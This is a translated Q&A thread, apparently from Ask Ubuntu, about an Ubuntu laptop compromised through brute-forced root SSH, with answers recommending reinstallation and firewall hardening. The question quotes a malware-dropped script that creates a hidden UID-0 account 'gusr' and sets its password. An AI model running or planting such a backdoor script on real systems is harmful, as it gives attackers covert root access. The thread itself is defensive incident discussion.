Como lidar com malware no meu laptop?

12

Estou bastante certo de que meu laptop Ubuntu 13.10 está infectado com algum tipo de malware.

De vez em quando, encontro um processo / lib / sshd (de propriedade do root) executando e consumindo muita CPU. Não é o servidor sshd que executa / usr / sbin / sshd.

O binário possui permissões --wxrw-rwt e gera e gera scripts no diretório / lib. Um recente é nomeado 13959730401387633604 e faz o seguinte

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

O usuário gusr foi criado pelo malware de forma independente e, em seguida, o chpasswd trava enquanto consome 100% da CPU.

Até agora, identifiquei que o usuário gusr foi adicionado adicionalmente aos arquivos em / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Parece que o malware fez cópias de todos esses arquivos com o sufixo "-". A lista completa dos arquivos / etc / que foram modificados pela raiz está disponível aqui .

Além disso, o arquivo / etc / hosts foi alterado para this .

O / lib / sshd começa adicionando-se ao final do arquivo /etc/init.d/rc.local!

Eu removi o usuário, removi os arquivos, matei a árvore processada, alterei minhas senhas e removi as chaves públicas do ssh.

Estou ciente de que estou basicamente ferrado e provavelmente reinstalarei todo o sistema. No entanto, desde que eu entrei em várias outras máquinas, seria bom pelo menos tentar removê-lo e descobrir como o consegui. Todas as sugestões sobre como fazer isso serão apreciadas.

Parece que eles entraram em 25 de março, forçando o login root com força bruta. Eu não tinha ideia de que o root ssh está ativado por padrão no Ubuntu. Desativei e coloquei denyhosts.

O login era de 59.188.247.236, aparentemente em algum lugar de Hong Kong.

Eu peguei o laptop do EmperorLinux e eles ativaram o acesso root. Se você tem um desses e está executando o sshd, tenha cuidado.

security malware Dejan Jovanović
fonte
2
Tire sua máquina da rede! Agora!
Seth
2
E por que você tem o login root ativado? Isso é algo que você não deve ativar sem uma boa razão.
Seth
@Seth eu não habilitei, estava ativado por padrão no Ubuntu. Estou tão surpreso quanto você.
Dejan Jovanović 30/03
1
Consulte " Por padrão, o daemon SSH é fornecido com logins raiz remotos ativados. Normalmente, o Ubuntu não permite acesso direto ao usuário raiz, portanto, essa configuração não é importante. Se você definiu uma senha na conta raiz, essa configuração pode ser um potencial risco de segurança e deve ser desativado. "
Seth
1
Estou bastante certo de que isso não é Linux/Ebury. É outra coisa e, possivelmente, não tem um nome atribuído. Ebury não criaria uma nova conta de usuário e teria modificado a biblioteca compartilhada usada pelo openssh, não descartada em um novo binário chamado sshd.
Riking 30/03

Respostas:

11

Primeiro, tire essa máquina da rede agora!

Segundo, por que você ativou a conta root? Você realmente não deve ativar a conta root, a menos que tenha um bom motivo para isso.

Em terceiro lugar, sim, a única maneira de garantir que você esteja limpo é fazer uma instalação limpa. Também é recomendável que você comece do zero e não volte para um backup, pois nunca pode ter certeza de quando tudo começou.

Sugiro também que você configure um firewall na sua próxima instalação e negue todas as conexões de entrada: 

sudo ufw default deny incoming

e permita ssh com: 

sudo ufw allow ssh

e NÃO habilite a conta root! Certamente verifique se o login do root ssh está desativado.

Seth
fonte
4
Eu verifiquei a conta root. Peguei o laptop do Emperorlinux e eles permitiram que a conta o configurasse. Estúpido.
Dejan Jovanović 30/03
1
@ DejanJovanović Isso é terrível!
Seth